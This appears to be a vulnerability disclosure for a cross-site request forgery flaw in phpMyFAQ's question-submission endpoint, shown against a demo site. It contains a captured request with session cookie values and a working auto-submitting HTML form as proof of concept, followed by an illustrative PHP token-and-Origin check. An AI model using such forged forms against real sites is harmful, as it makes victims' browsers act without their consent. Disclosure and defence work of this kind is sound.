Any user can add questions in the FAQ section –> https://roy.demo.phpmyfaq.de/index.php?action=ask&category_id=0
This section is vulnerable to CSRF. An attacker can abuse this without prior knowledge of others’. A successful CSRF attack submits new questions from the victim’s browser.
POST /ajaxservice.php?action=savequestion HTTP/2
Host: roy.demo.phpmyfaq.de
Cookie: PHPSESSID=<ID-VALUE>; pmf_sid=22383; cookieconsent_status=dismiss; phpbb3_6zg4_u=1; phpbb3_6zg4_k=; phpbb3_6zg4_sid=68a52c0cd02a54757d476703488f677a
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 82
Sec-Gpc: 1
Te: trailers

lang=en&name=Demouser&email=demouser%40phpmyfaq.de&category=13&question=Execute-4?
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://roy.demo.phpmyfaq.de/ajaxservice.php?action=savequestion" method="POST">
<input type="hidden" name="lang" value="en" />
<input type="hidden" name="name" value="Demouser" />
<input type="hidden" name="email" value="demouser@phpmyfaq.de" />
<input type="hidden" name="category" value="13" />
<input type="hidden" name="question" value="Execute-4?" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Link –> https://drive.google.com/file/d/1uIOoJ-mg17hZutheEbUW3umI1WlU_vLP/view?usp=sharing
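A server-side check that rejects the auto-submitted form above, as an added example that is not part of the original report and is not phpMyFAQ's own code. The helper names, the `csrf` field name and the `faq.example` origins are assumptions made for illustration; the sample requests are constructed.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers, not phpMyFAQ's API. CSRF_FIELD is an assumed form field name.
const CSRF_FIELD = 'csrf';

/** Create one random token per session; the ask-question form embeds it as a hidden field. */
function issueCsrfToken(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** Accept a state-changing POST only if it carries the session token and, when sent, a same-site Origin. */
function isRequestTrusted(array $session, array $post, array $headers, string $siteOrigin): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post[CSRF_FIELD] ?? '';
    // Constant-time comparison; a missing or non-string token fails closed.
    if (!is_string($supplied) || $expected === '' || !hash_equals($expected, $supplied)) {
        return false;
    }
    // Defence in depth: browsers attach Origin to cross-site form POSTs.
    $origin = $headers['Origin'] ?? null;
    return $origin === null || $origin === $siteOrigin;
}

// --- Constructed sample requests (same fields as the request in the report) ---
$site    = 'https://faq.example';
$session = [];
$token   = issueCsrfToken($session);
$fields  = [
    'lang' => 'en', 'name' => 'Demouser', 'email' => 'demouser@phpmyfaq.de',
    'category' => '13', 'question' => 'Execute-4?',
];

// Cross-site form: the browser sends the session cookie, but the page cannot read the token.
$forged = isRequestTrusted($session, $fields, ['Origin' => 'https://other.example'], $site);
// The site's own form includes the token issued for this session.
$genuine = isRequestTrusted($session, $fields + [CSRF_FIELD => $token], ['Origin' => $site], $site);

echo 'forged request accepted:  ', var_export($forged, true), PHP_EOL;
echo 'genuine request accepted: ', var_export($genuine, true), PHP_EOL;
```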